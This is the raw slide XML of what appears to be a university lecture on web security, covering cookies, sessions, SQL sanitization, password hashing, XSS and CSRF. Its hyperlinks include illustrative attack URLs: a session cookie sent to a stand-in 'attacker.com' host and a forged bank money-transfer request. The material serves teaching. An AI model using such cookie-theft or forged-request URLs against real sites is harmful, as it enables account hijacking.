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763" r:id="rId3"/>
    <p:sldId id="764" r:id="rId4"/>
    <p:sldId id="765" r:id="rId5"/>
    <p:sldId id="766" r:id="rId6"/>
    <p:sldId id="771" r:id="rId7"/>
    <p:sldId id="778" r:id="rId8"/>
    <p:sldId id="779" r:id="rId9"/>
    <p:sldId id="780" r:id="rId10"/>
    <p:sldId id="781" r:id="rId11"/>
    <p:sldId id="782" r:id="rId12"/>
    <p:sldId id="791" r:id="rId13"/>
    <p:sldId id="792" r:id="rId14"/>
    <p:sldId id="793" r:id="rId15"/>
    <p:sldId id="794" r:id="rId16"/>
    <p:sldId id="795" r:id="rId17"/>
    <p:sldId id="802" r:id="rId18"/>
    <p:sldId id="803" r:id="rId19"/>
    <p:sldId id="798" r:id="rId20"/>
    <p:sldId id="799" r:id="rId21"/>
    <p:sldId id="800" r:id="rId22"/>
    <p:sldId id="801" r:id="rId23"/>
    <p:sldId id="797" r:id="rId24"/>
    <p:sldId id="796" r:id="rId25"/>
    <p:sldId id="813" r:id="rId26"/>
    <p:sldId id="783" r:id="rId27"/>
    <p:sldId id="784" r:id="rId28"/>
    <p:sldId id="785" r:id="rId29"/>
    <p:sldId id="786" r:id="rId30"/>
    <p:sldId id="787" r:id="rId31"/>
    <p:sldId id="788" r:id="rId32"/>
    <p:sldId id="789" r:id="rId33"/>
    <p:sldId id="790" r:id="rId34"/>
    <p:sldId id="804" r:id="rId35"/>
    <p:sldId id="805" r:id="rId36"/>
    <p:sldId id="806" r:id="rId37"/>
    <p:sldId id="807" r:id="rId38"/>
    <p:sldId id="808" r:id="rId39"/>
    <p:sldId id="810" r:id="rId40"/>
    <p:sldId id="812" r:id="rId41"/>
    <p:sldId id="811" r:id="rId42"/>
    <p:sldId id="814" r:id="rId43"/>
    <p:sldId id="815" r:id="rId44"/>
    <p:sldId id="816" r:id="rId45"/>
    <p:sldId id="817" r:id="rId46"/>
    <p:sldId id="818" r:id="rId47"/>
    <p:sldId id="819" r:id="rId48"/>
    <p:sldId id="820" r:id="rId49"/>
    <p:sldId id="821" r:id="rId50"/>
    <p:sldId id="822" r:id="rId51"/>
    <p:sldId id="823" r:id="rId52"/>
    <p:sldId id="824" r:id="rId53"/>
    <p:sldId id="825" r:id="rId54"/>
    <p:sldId id="827" r:id="rId55"/>
    <p:sldId id="826" r:id="rId56"/>
    <p:sldId id="830" r:id="rId57"/>
    <p:sldId id="831" r:id="rId58"/>
    <p:sldId id="832" r:id="rId59"/>
    <p:sldId id="833" r:id="rId60"/>
    <p:sldId id="834" r:id="rId61"/>
    <p:sldId id="828" r:id="rId62"/>
    <p:sldId id="82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F"/>
    <a:srgbClr val="000DFF"/>
    <a:srgbClr val="E15101"/>
    <a:srgbClr val="00F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/>
    <p:restoredTop sz="96405"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1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D3D46-709D-EE4F-9951-18578BF99570}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/3/22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6534D-9716-7046-85CE-732F0B11E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6534D-9716-7046-85CE-732F0B11E5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9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6534D-9716-7046-85CE-732F0B11E5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98DF-88B6-A541-81E5-0B9D35B4CC74}" type="datetime1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587320"/>
            <a:ext cx="12192000" cy="1270680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E1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81" y="5692095"/>
            <a:ext cx="3270437" cy="10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1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E83E-F98B-9541-A47F-6AC26A0B843C}" type="datetime1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EDC-31DC-2140-AEC8-9EF06ACF5E2F}" type="datetime1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C48C-BD00-F743-8537-F7FCF8076B66}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/3/22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719A7ED9-D9CA-CB41-8473-7B8166EC30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E507-C9F2-3B44-A449-07A7EC7F64F1}" type="datetime1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59-987D-C244-960D-11366F9795EE}" type="datetime1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2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85C-DFE4-B545-ADF8-8BC535C4E152}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/3/22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F393-BAE6-1948-8A84-D14C99E402A2}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/3/22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6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72AD-FBD2-6541-AD62-12F059411C96}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/3/22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D9ABA-7DBC-4A44-8154-14ACD2203E7A}" type="datetime1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BC5B-00AD-8F45-B118-A74B3874F4C0}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/3/22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657A8-BBD0-9249-991D-95E7AC4FCBD4}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/3/22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://www.exampl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pi.github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pi.github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ome_bank_website.com/send_mone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ttacker.com/?cookie=session=8e5f8693-9983-d3fd-939849239482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ttacker.com/?cookie=session=8e5f8693-9983-d3fd-93984923948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tf.unexploitable.systems/logout" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ctf.unexploitable.systems/login?id=blue9057&amp;pw=stongpassword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tf.unexploitable.systems/logou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tf.unexploitable.systems/logout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bing.com/search?q=shoes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search?q=shoe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tf.unexploitable.systems/login%20HTTP/1.0" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ctf.unexploitable.systems/login?username=blue9057&amp;password=asdfas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ctf.unexploitable.systems/logout?CSRFtoken=23948902382903902aaab98a988ab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370</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Introduction to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Web Security (XSS, CSRF, etc.)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5CEEE-A655-9D4B-AA1D-8E725CF4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40E2B-D2D4-B2F8-6666-C5D19B09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Frameworks Provides a Good APIs for Sanitizing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1233B-FC8D-FD28-95AE-E3BCB8E54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dirty="0"/>
              <a:t>Good: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Bad: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001E5-06ED-D167-AD28-910FCB1D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6E4C04-EBFA-B95A-329A-09B74E3B2F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00" y="2312307"/>
            <a:ext cx="7772400" cy="147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CABBAD-3324-8100-6725-075E83D6F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4780935"/>
            <a:ext cx="6985000" cy="4064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62CD81E-4E86-4DD9-9E27-5C8D767A3D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643" y="5552176"/>
            <a:ext cx="7772400" cy="11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86F1-ADA0-26D2-A007-AE9B9D89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These</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input Sanitization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B819-D2F5-24C7-AA32-CA864D36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replace bad characters to benign characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g.,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>‘ -&gt; \’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“ -&gt; \”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\ -&gt; \\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Purpose: Preventing breaking out the string input area in the query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7B755-81AD-A0F4-89EA-750F1837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6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9EEA-487D-FFB7-8837-A076A737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Manage Login Status?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9C5B-099E-27F1-B1E6-43DDDF6C6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database to check user’s password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT (username, password) FROM users WHERE username = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000DFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>blue9057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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SHA256(secret + “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000CFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>my-super-secure-password!@#$11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”)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After passing the check, server issues a token called ‘Cookie’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookie: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c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85FF7-27D6-B2E9-73F2-13F0247E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7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B836-73B5-F32B-467D-86EFD5FF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Password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34D8-3BED-3AD4-2233-9EA63567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12286" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Send ID/password and the server creates/stores a cookie in session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0305-7D0A-548D-226C-57C03968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Apps internet web browser Icon | Oxygen Iconset | Oxygen Team">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FB5DA24-3F51-E08A-4A08-F8F92F7E7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4879" y="4488997"/>
            <a:ext cx="1613807" cy="16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What is a Web Server and What is it used for? – Lizzie's Website">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C217812E-46D4-BC3D-AC58-C6E62A59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7150" y="3733800"/>
            <a:ext cx="2603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425050-48E2-3778-5128-752F5B487019}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2728686" y="5204725"/>
            <a:ext cx="6088743" cy="369"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="41275">
            <a:solidFill>
              <a:srgbClr val="000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616E6D-BF64-A3B0-2968-99226C50A679}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4342493" y="5204725"/>
            <a:ext cx="25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Protected by TLS (HTTPS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Database - Free technology icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{112248A0-9809-A915-6C5A-6AD75BFB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2379" y="2251876"/>
            <a:ext cx="1475475" cy="14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4BE0B7-CE69-71FE-4B78-5CBA82EC00C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="375557" y="3886200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blue9057: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>some_password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3BFC4C-5781-47C3-A93A-C97F8FC6ACBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="2050" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8621486" y="2989614"/>
            <a:ext cx="1190893" cy="1092529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ED6A08-4919-53EF-1BA8-DE3F3CB47E29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7979958" y="2967140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with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224D9D-A43C-39B0-FC1D-31A740B6A965}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6551522" y="2271882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Cookie string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>session[Cookie] = ‘blue9057’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16FCCE-FD75-6C23-01A2-F0F2CF3368BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4992050" y="3429000"/>
            <a:ext cx="495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Set-Cookie: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9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47B525-8CC9-4CDE-ED02-61265F8F87AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6807748" y="6225890"/>
            <a:ext cx="207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example.com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828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58659 1.4814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34727 -0.0018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7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6" grpId="0"/>
      <p:bldP spid="17" grpId="0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B836-73B5-F32B-467D-86EFD5FF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Password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34D8-3BED-3AD4-2233-9EA63567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stores the cookie for the website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0305-7D0A-548D-226C-57C03968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Apps internet web browser Icon | Oxygen Iconset | Oxygen Team">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FB5DA24-3F51-E08A-4A08-F8F92F7E7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4879" y="4488997"/>
            <a:ext cx="1613807" cy="16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What is a Web Server and What is it used for? – Lizzie's Website">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C217812E-46D4-BC3D-AC58-C6E62A59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7150" y="3733800"/>
            <a:ext cx="2603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425050-48E2-3778-5128-752F5B487019}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2728686" y="5204725"/>
            <a:ext cx="6088743" cy="369"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="41275">
            <a:solidFill>
              <a:srgbClr val="000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616E6D-BF64-A3B0-2968-99226C50A679}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4342493" y="5204725"/>
            <a:ext cx="25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Protected by TLS (HTTPS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Database - Free technology icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{112248A0-9809-A915-6C5A-6AD75BFB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2379" y="2251876"/>
            <a:ext cx="1475475" cy="14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F4012D-7387-A6F7-DE7D-5AD4532B69BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2804947"/>
            <a:ext cx="495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Set-Cookie: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9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08F6B-F47E-A3AD-E246-6633C2D425A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="195943" y="3206883"/>
            <a:ext cx="3764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sets it’s cookie for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>example.com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43046-CC20-2693-84D4-E756E22AFF9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6807748" y="6225890"/>
            <a:ext cx="207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example.com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173478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B836-73B5-F32B-467D-86EFD5FF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Password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34D8-3BED-3AD4-2233-9EA63567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sends back the cookie for the next request…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0305-7D0A-548D-226C-57C03968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Apps internet web browser Icon | Oxygen Iconset | Oxygen Team">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FB5DA24-3F51-E08A-4A08-F8F92F7E7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4879" y="4488997"/>
            <a:ext cx="1613807" cy="16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What is a Web Server and What is it used for? – Lizzie's Website">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C217812E-46D4-BC3D-AC58-C6E62A59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7150" y="3733800"/>
            <a:ext cx="2603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425050-48E2-3778-5128-752F5B487019}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2728686" y="5204725"/>
            <a:ext cx="6088743" cy="369"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="41275">
            <a:solidFill>
              <a:srgbClr val="000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616E6D-BF64-A3B0-2968-99226C50A679}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4342493" y="5204725"/>
            <a:ext cx="25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Protected by TLS (HTTPS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Database - Free technology icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{112248A0-9809-A915-6C5A-6AD75BFB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2379" y="2251876"/>
            <a:ext cx="1475475" cy="14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F4012D-7387-A6F7-DE7D-5AD4532B69BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3424426"/>
            <a:ext cx="4590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/user-info HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>example.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000DFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cookie: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9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43046-CC20-2693-84D4-E756E22AFF9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6807748" y="6225890"/>
            <a:ext cx="207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example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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FD9DF-B273-6B4A-E73D-1B2D7E09958F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6321364" y="2251876"/>
            <a:ext cx="3047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will fetch the username</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>username = sessions[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000DFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>if username == None:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>login_failed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5269D-2A2A-E457-4910-857B5935D92E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6525001" y="4297953"/>
            <a:ext cx="2003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OK HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You are ‘blue9057’!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="386688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844 0 " pathEditMode="relative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-0.39349 0.2233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74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/>
      <p:bldP spid="13" grpId="0"/>
      <p:bldP spid="1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6547-8ECE-8B32-9D74-319589D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CB96-CEB5-3FEF-016B-8314956E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store state of the connection between server/client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server maintains all the status</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the user has been logged in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For which user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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Server uses a token generated for the user, that’s Cookie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7FDE6-1766-52D5-08B4-42F98622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84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6547-8ECE-8B32-9D74-319589D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CB96-CEB5-3FEF-016B-8314956EE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 way to store state of the connection between server/client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client needs to store the issued Cookie, and use that to fetch the status on the server…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Web browser manages this automatically for the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookie, typically issued for each website domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So, the browser keeps a database of cookies like</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Cookie: a9djfipj0h230fh238hf8302f823u</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>my.oregonstate.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Cookie: jdk9sj9jf99f9j329fj230fjkjkJKJKJK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.google.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Cookie: asdfjkasdjflkasjdfklajsd82398289</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And the next time you connect to the site, the browser fetches the cookie from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server can set the timestamp to expire a cookie in the session (e.g., 1 hour)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7FDE6-1766-52D5-08B4-42F98622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AA01-B073-43AF-B69A-A70DA74C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Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CTFd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> at</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ctf.unexploitable.systems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19D66-015B-6178-6717-698A8A69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Accessed https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ctf.unexploitable.systems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43AB7-D6D1-120E-4C89-B81808B67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364F131-7C73-A824-F387-D4540799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261394"/>
            <a:ext cx="4343400" cy="17399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FAD2C9C-2915-8F79-E59F-5EA07DB1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3916363"/>
            <a:ext cx="6350000" cy="2260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C4308A-A5A3-39EB-9762-4B5B17654897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5698671" y="5617029"/>
            <a:ext cx="6175829" cy="31024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5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6547-8ECE-8B32-9D74-319589D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Our Scoring Server (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CTFd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)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CB96-CEB5-3FEF-016B-8314956E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query securely with sanitization (use query method)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Verify password hashed with SHA256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7FDE6-1766-52D5-08B4-42F98622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A60139C-D94A-AB87-CF0A-8578CC6CC8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57" y="4346129"/>
            <a:ext cx="7772400" cy="1174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9D1A5-03E2-A2F2-D385-16ECCB78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957" y="5651500"/>
            <a:ext cx="7124700" cy="6604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AE96658-F440-5C70-8BE2-29182B9B9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957" y="2343822"/>
            <a:ext cx="7772400" cy="12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E83EE-06CF-15C0-2AE3-8AB97B41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Hashed-password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E452D-B118-62BC-A7E7-1808EA8D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59636881ab9bf34263cf3f4d90f25d2b91e74e8804b802d25c8f4bc5c80846ee</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SHA256(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>some_secret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” + “my-super-secure-password!@#$11”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can the attackers who steal the hash recover the password?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is the same as, what is the inverse of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>“59636881ab9bf34263cf3f4d90f25d2b91e74e8804b802d25c8f4bc5c80846ee”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 finding an inverse of SHA256 is technically infeasible…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3B6D-55C5-F2AB-D3B4-5DF90D57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5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6547-8ECE-8B32-9D74-319589D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Our Scoring Server (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CTFd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)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7CB96-CEB5-3FEF-016B-8314956EE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4351338"/>
          </a:xfrm>
        </p:spPr>
